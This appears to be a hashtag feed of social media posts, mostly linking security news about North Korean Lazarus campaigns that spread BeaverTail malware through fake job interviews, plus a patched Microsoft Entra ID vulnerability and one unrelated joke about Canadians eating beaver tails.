📢⚠️Watch as North Korean Lazarus hackers tried to infect #AllSecure CEO Chris Papathanasiou through a fake LinkedIn job interview. The attackers used a coding test loaded with the notorious #BeaverTail malware. 🦫

Read: https://hackread.com/fake-linkedin-interview-lazarus-hackers-allsecure-ceo/

#CyberSecurity #Lazarus #NorthKorea #LinkedIn #Scam

"... they wear shorts outside in February to shovel snow, and they eat beaver tails! Canadians are either really tough, or effing crazy."

#Canada #Canadian #snow #shovel #shorts #BeaverTail #misunderstanding #tough #crazy

NEW: Developers, crypto users, and job seekers beware - North Korea’s Lazarus Group is deploying a new #BeaverTail variant to steal credentials and crypto via fake job offers, dev tools and smart contracts.

Read: https://hackread.com/lazarus-embed-beavertail-variant-developer-tools/

#CyberSecurity #Lazarus #NorthKorea #DevSec #InfoStealer

Watch out as the North Korean hackers from the #FamousChollima group are using fake job offers to spread BeaverTail and OtterCookie malware, stealing crypto and credentials in a new attack.

Read: https://hackread.com/nk-famous-chollima-beavertail-ottercookie-malware/

#Cybersecurity #Malware #BeaverTail #OtterCookie #NorthKorea

It's been a bit quiet over the last 24 hours, but we've still got a couple of critical updates to cover, including a significant vulnerability in Microsoft Entra ID and evolving tactics from DPRK threat actors. Let's dive in:

Global Admin Access in Microsoft Entra ID ⚠️

- A critical vulnerability (CVE-2025-55241) in Microsoft Entra ID (formerly Azure AD) could have allowed an attacker to gain Global Administrator privileges in *any* company's tenant.
- The flaw stemmed from a combination of undocumented, unsigned "actor tokens" and a vulnerability in the deprecated Azure AD Graph API, enabling impersonation and bypassing Conditional Access policies.
- Crucially, exploitation left virtually no trace in the victim tenant's logs, making detection extremely difficult. Microsoft has since patched the issue and is working to remove the underlying legacy components.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/microsoft-entra-id-flaw-allowed-hijacking-any-companys-tenant/

DPRK Hackers Evolve Tactics with ClickFix and AI 📰

- North Korean threat actors, a subset of the Lazarus Group, are refining their "Contagious Interview" campaigns, now using "ClickFix" social engineering to deliver BeaverTail info-stealer and InvisibleFerret backdoor.
- A notable shift in targeting sees them focusing on marketing and trader roles in cryptocurrency and retail sectors, moving beyond their traditional software developer targets, and delivering malware as compiled binaries for multiple OS.
- These groups are actively monitoring cyber threat intelligence platforms to improve their operational resilience, with other DPRK groups like Kimsuky also leveraging GitHub for C2 and even ChatGPT to forge deepfake military IDs for spear-phishing.

📰 The Hacker News | https://thehackernews.com/2025/09/dprk-hackers-use-clickfix-to-deliver.html

#CyberSecurity #Vulnerability #Microsoft #EntraID #AzureAD #ThreatIntelligence #DPRK #NorthKorea #LazarusGroup #Malware #BeaverTail #InvisibleFerret #SocialEngineering #ClickFix #APT #InfoSec #CyberAttack